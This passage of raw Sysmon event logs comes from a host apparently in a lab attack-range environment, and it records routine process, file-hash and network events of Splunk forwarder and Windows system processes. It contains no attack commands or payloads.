:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.718{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.719{266CAFBE-6624-6064-6201-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:04.265{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C6F2FD7778AC0FDE0220EDE973FAAB,SHA256=A94F9D8E14E5CCCB52EDA3BB3C9BBF9A7C39173DC3478EA080D54215D3959EE0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000010418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:05.280{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BE1209455CCF72E3CB1040F06364825,SHA256=CD38B6482D8995D8A2B0775C38FA842B9702D3621171FB60FD6615EC77114B43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.499{266CAFBE-6626-6064-6301-00000000AE01}43206944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:06.343{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EC18367F2856F132E0B9053AE82518C,SHA256=5D063358A537CACF022CF2936AAD2EB5672A86FAAFF6331894267589029D9C3C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:06.343{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.343{266CAFBE-6626-6064-6301-00000000AE01}4320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.827{266CAFBE-6627-6064-6501-00000000AE01}68606104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:06.617{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53694-false10.0.1.12-8000- 10341000x800000000000000010446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.655{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.656{266CAFBE-6627-6064-6501-00000000AE01}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.358{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=252D9492507032C0EA3F026BE2B92F41,SHA256=BA5F65344F55CD05D46B5D469C36B235E63C2405CA0B4E961FA60CD3050D17F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.171{266CAFBE-6627-6064-6401-00000000AE01}70206836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
